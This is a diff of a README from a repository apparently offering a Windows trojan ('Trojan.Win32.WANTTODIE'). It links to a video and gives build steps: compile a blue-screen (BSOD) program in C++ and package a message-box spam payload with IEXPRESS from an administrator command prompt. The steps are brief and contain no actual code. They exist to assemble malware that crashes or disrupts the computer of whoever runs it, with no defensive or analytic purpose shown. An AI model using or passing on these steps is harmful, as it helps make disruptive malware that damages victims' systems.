Arturzek/Trojan.Win32.WANTTODIE/README.md

 https://drive.google.com/file/d/1JQe1erpH6BDPo3f6EdO_pVXnKxQ-WkA-/view?usp=sharing
 (the mp4 video)

-And Build the BSOD and have Box Spam Compiled.
+Build the BSOD and have Box Spam Compiled.

 Build BSOD in C++, just copy the main code.

 In the box spam follow the steps:

 1.Open CMD as a administrator

 2.Type "start IEXPRESS" (without the quotes)